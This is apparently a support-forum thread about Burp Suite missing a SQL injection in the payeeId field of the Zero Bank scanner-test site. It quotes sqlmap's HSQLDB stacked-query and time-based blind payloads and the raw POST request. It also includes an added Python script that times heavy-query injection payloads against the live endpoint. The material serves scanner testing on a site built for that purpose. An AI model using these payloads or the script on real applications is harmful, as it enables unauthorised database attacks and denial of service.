Missed SQL Injection
Doing some tests, I noticed that Burp (version 2.1.04) is missing the SQL injection at http://zero.webappsecurity.com in the POST data field payeeId.
SQLmap will identify it as follows:
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
Parameter: payeeId (POST)
Type: stacked queries
Title: HSQLDB >= 1.7.2 stacked queries (heavy query - comment)
Payload: payeeId=abc';CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(7251),0),500000000),NULL)--
Type: time-based blind
Title: HSQLDB > 2.0 OR time-based blind (heavy query)
Payload: payeeId=abc' OR CHAR(76)||CHAR(86)||CHAR(107)||CHAR(117)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)-- GsOo
[14:02:48] [INFO] the back-end DBMS is HSQLDB
The POST request where Burp should have found the injection is:
POST /bank/pay-bills-get-payee-details.html HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONID=29DB5859; username=username; password=password
The website is created for testing web scanner applications, please feel free to use it for that purpose.
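A quick way to re-check a finding like this by hand, independently of either scanner, is to time the request with the heavy query sqlmap used against a "light" variant of the same payload and a benign value. This is an added example, not code from the original post, from Burp or from sqlmap. It assumes payeeId is the only field in the POST body (the body is not shown above), reuses the cookie from the post, and the round count and 5-second threshold are arbitrary choices; the payload builder reproduces the structure of the HSQLDB time-based payload sqlmap reported.

```python
"""Time-based blind SQL injection re-check for the HSQLDB heavy-query case.

Added example, not from the original post or from Burp/sqlmap. Three variants
of the same request are timed: a benign value, the heavy-query payload with
REPEAT(...,1) (cheap), and the real one with REPEAT(...,500000000). Only the
last should be slow if payeeId is injectable; a slow server or a slow network
makes all three slow and is therefore not reported as a finding.
"""
import statistics
import time
import urllib.parse
import urllib.request

TARGET = "http://zero.webappsecurity.com/bank/pay-bills-get-payee-details.html"  # from the post
COOKIE = "JSESSIONID=29DB5859; username=username; password=password"             # from the post
PARAM = "payeeId"   # assumption: the only field in the POST body


def hsqldb_chars(s: str) -> str:
    """Encode a literal as CHAR(n)||CHAR(n)... so the payload carries no extra quotes
    (this is how sqlmap wrote 'LVku' and 'AES' in the payload above)."""
    return "||".join(f"CHAR({ord(c)})" for c in s)


def build_payload(base: str, repeat_count: int) -> str:
    """Injected parameter value. REPEAT() of an empty string repeat_count times is the
    CPU-heavy part; REGEXP_SUBSTRING() stops HSQLDB from short-circuiting it. The
    comparison is always false, so the query result is unchanged: only the time differs."""
    heavy = (f"REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY({hsqldb_chars('AES')},NULL),0),"
             f"{repeat_count}),NULL)")
    return f"{base}' OR {hsqldb_chars('LVku')}={heavy}-- "


def time_request(send, value: str, rounds: int) -> float:
    """Median wall-clock seconds of send(value) over several rounds (median resists jitter)."""
    samples = []
    for _ in range(rounds):
        t0 = time.perf_counter()
        send(value)
        samples.append(time.perf_counter() - t0)
    return statistics.median(samples)


def is_time_based_injectable(send, base: str = "abc", rounds: int = 3,
                             min_delay: float = 5.0) -> bool:
    """True only if the heavy query is slower than BOTH the benign value and the
    cheap variant by at least min_delay seconds."""
    benign = time_request(send, base, rounds)
    light = time_request(send, build_payload(base, 1), rounds)
    heavy = time_request(send, build_payload(base, 500_000_000), rounds)
    return heavy - max(benign, light) >= min_delay


def http_send(value: str) -> None:
    """POST the value as the payeeId field, mirroring the request from the post.
    A timeout is swallowed on purpose: the caller measures elapsed time, and a
    request that ran into the timeout is exactly the slow case we are looking for."""
    body = urllib.parse.urlencode({PARAM: value}).encode()
    req = urllib.request.Request(
        TARGET, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                 "Cookie": COOKIE,
                 "User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=60) as resp:
            resp.read()
    except OSError:
        pass


if __name__ == "__main__":
    # Live run against the test site named in the post (not executed offline).
    print("payeeId time-based injectable:", is_time_based_injectable(http_send))
```

The cheap variant is the important control: without it a server that is merely slow, or a WAF that tarpits anything containing a quote, would look like a time-based finding. Run it a few times at different hours before trusting the answer; shared test sites are noisy.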
We have this feature in this year's roadmap. Once we release the updated version of the crawler, we should find this issue with a crawl and audit.
If I can be of any further assistance, please let me know.